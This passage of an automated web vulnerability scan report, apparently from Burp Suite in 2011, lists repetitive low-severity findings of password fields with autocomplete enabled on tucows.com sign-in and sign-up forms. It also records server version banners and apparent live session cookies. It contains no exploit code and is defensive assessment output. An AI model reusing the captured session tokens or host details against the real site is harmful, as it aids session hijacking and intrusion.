Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.50. http://www.tucows.com/contact.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.51. http://www.tucows.com/images/newassets/contact.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.52. http://www.tucows.com/images/newassets/contact.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/contact.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.53. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.54. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.55. http://www.tucows.com/images/newassets/includes/js/aalib.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.56. http://www.tucows.com/images/newassets/includes/js/aalib.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.57. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.58. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/ajaxlib.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.59. http://www.tucows.com/images/newassets/includes/js/show_layer.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.60. http://www.tucows.com/images/newassets/includes/js/show_layer.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.61. http://www.tucows.com/images/newassets/includes/js/signupin.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
